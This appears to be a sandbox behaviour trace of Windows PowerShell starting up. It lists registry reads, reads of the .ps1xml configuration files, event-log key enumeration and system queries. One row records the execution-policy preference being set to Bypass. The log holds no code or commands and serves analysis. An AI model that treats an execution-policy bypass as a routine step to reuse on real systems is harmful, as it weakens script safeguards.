File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	10	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	16	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
